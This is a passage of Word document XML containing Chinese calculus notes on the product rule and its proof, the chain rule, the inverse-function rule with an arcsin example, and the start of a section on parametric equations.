          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="133350" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="图片 108" descr="说明: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说明: C"/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1152" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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188"/>
        <w:gridCol w:w="2526"/>
      </w:tblGrid>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4</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390650" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="107" name="图片 107" descr="说明: [Cv(x)]'=Cv'(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说明: [Cv(x)]'=Cv'(x)"/>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5</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533525" cy="504825"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="106" name="图片 106" descr="说明: \left[{\frac  {C}{v(x)}}\right]'={\frac  {-Cv'(x)}{v^{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说明: \left[{\frac  {C}{v(x)}}\right]'={\frac  {-Cv'(x)}{v^{2}(x)}}"/>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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以上法则的证明中，对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，可以利用极限的运算法则验证；对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，可以直接使用导数定义证明，证明如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2790825" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="105" name="图片 105" descr="说明: [u(x)v(x)]'=u'(x)v(x)+u(x)v'(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说明: [u(x)v(x)]'=u'(x)v(x)+u(x)v'(x)"/>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90825" cy="209550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证明如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4143375" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="104" name="图片 104" descr="说明: [u(x)v(x)]'=\lim _{{\Delta x\to 0}}{\frac  {u(x+\Delta x)v(x+\Delta x)-u(x)v(x)}{\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说明: [u(x)v(x)]'=\lim _{{\Delta x\to 0}}{\frac  {u(x+\Delta x)v(x+\Delta x)-u(x)v(x)}{\Delta x}}"/>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43375" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（导数的定义式）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5381625" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="103" name="图片 103" descr="说明: =\lim _{{\Delta x\to 0}}\left[{\frac  {u(x+\Delta x)-u(x)}{\Delta x}}\cdot v(x+\Delta x)+u(x)\cdot {\frac  {v(x+\Delta x)-v(x)}{\Delta x}}\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说明: =\lim _{{\Delta x\to 0}}\left[{\frac  {u(x+\Delta x)-u(x)}{\Delta x}}\cdot v(x+\Delta x)+u(x)\cdot {\frac  {v(x+\Delta x)-v(x)}{\Delta x}}\right]"/>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381625" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6057900" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="102" name="图片 102" descr="说明: =\lim _{{\Delta x\to 0}}{\frac  {u(x+\Delta x)-u(x)}{\Delta x}}\cdot \lim _{{\Delta x\to 0}}v(x+\Delta x)+u(x)\cdot \lim _{{\Delta x\to 0}}{\frac  {v(x+\Delta x)-v(x)}{\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说明: =\lim _{{\Delta x\to 0}}{\frac  {u(x+\Delta x)-u(x)}{\Delta x}}\cdot \lim _{{\Delta x\to 0}}v(x+\Delta x)+u(x)\cdot \lim _{{\Delta x\to 0}}{\frac  {v(x+\Delta x)-v(x)}{\Delta x}}"/>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57900" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1895475" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="101" name="图片 101" descr="说明: =u'(x)v(x)+u(x)v'(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说明: =u'(x)v(x)+u(x)v'(x)"/>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95475" cy="209550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2076450" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="100" name="图片 100" descr="说明: =v(x){\frac  {du(x)}{dx}}+u(x){\frac  {dv(x)}{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说明: =v(x){\frac  {du(x)}{dx}}+u(x){\frac  {dv(x)}{dx}}"/>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076450" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>复合函数求导</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1920" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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188"/>
        <w:gridCol w:w="2856"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E3E3"/>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求导法则</w:t>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1</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752600" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="99" name="图片 99" descr="说明: [u(v(x))]'=u'(v)v'(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说明: [u(v(x))]'=u'(v)v'(x)"/>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752600" cy="209550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>反函数的求导</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>设函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="98" name="图片 98" descr="说明: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说明: y=f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="97" name="图片 97"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的某个邻域内连续，严格单调，且在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="96" name="图片 96"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可导而且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="723900" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="说明: f'(y)\neq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说明: f'(y)\neq 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不成立。则它的反函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="876300" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="94" name="图片 94" descr="说明: x=f^{{-1}}(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说明: x=f^{{-1}}(y)"/>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r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="93" name="图片 93" descr="说明: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说明: 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可导，且有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1343025" cy="438150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="说明: [f^{{-1}}(y)]'={\frac  {1}{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说明: [f^{{-1}}(y)]'={\frac  {1}{f'(x)}}"/>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343025" cy="438150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009B4778">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="图片 91" descr="说明: {\frac  {dy}{dx}}={\frac  {1}{{\frac  {dx}{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说明: {\frac  {dy}{dx}}={\frac  {1}{{\frac  {dx}{dy}}}}"/>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85800" cy="495300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>我们可以用一个例子来说明：试求函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1647825" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="90" name="图片 90" descr="说明: y=\arcsin x(|x|&l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说明: y=\arcsin x(|x|&lt;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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的导函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1647825" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="89" name="图片 89" descr="说明: y=\arcsin x(|x|&l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说明: y=\arcsin x(|x|&lt;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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1447800" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="图片 88" descr="说明: x=\sin y(\left|y\right|&lt;{\frac  {\pi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说明: x=\sin y(\left|y\right|&lt;{\frac  {\pi }{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447800" cy="342900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的反函数，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="714375" cy="171450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="87" name="图片 87" descr="说明: x=\sin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说明: x=\sin y"/>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714375" cy="171450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1143000" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="86" name="图片 86" descr="说明: I_{y}=\left(-{\frac  {\pi }{2}},{\frac  {\pi }{2}}\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说明: I_{y}=\left(-{\frac  {\pi }{2}},{\frac  {\pi }{2}}\righ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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>开区间上严格单调、可导，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1495425" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="85" name="图片 85" descr="说明: (\sin y)'=\cos y&g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说明: (\sin y)'=\cos y&gt;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r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>因此由反函数求导法则可得：在对应区间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="952500" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="图片 84" descr="说明: I_{y}=(-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说明: I_{y}=(-1,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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4429125" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="83" name="图片 83" descr="说明: (\arcsin x)'={\frac  {1}{(\sin y)'}}={\frac  {1}{\cos y}}={\frac  {1}{{\sqrt  {1-\sin ^{{2}}y}}}}={\frac  {1}{{\sqrt  {1-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说明: (\arcsin x)'={\frac  {1}{(\sin y)'}}={\frac  {1}{\cos y}}={\frac  {1}{{\sqrt  {1-\sin ^{{2}}y}}}}={\frac  {1}{{\sqrt  {1-x^{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429125" cy="533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>参数方程和极坐标方程的求导</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:tooltip="参数方程（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>参数方程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1971675" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="82" name="图片 82" descr="说明: {\begin{cases}x=\psi (t)\\y=\phi (t)\end{cases}}(\alpha \leq t\leq \b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说明: {\begin{cases}x=\psi (t)\\y=\phi (t)\end{cases}}(\alpha \leq t\leq \beta )"/>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971675" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
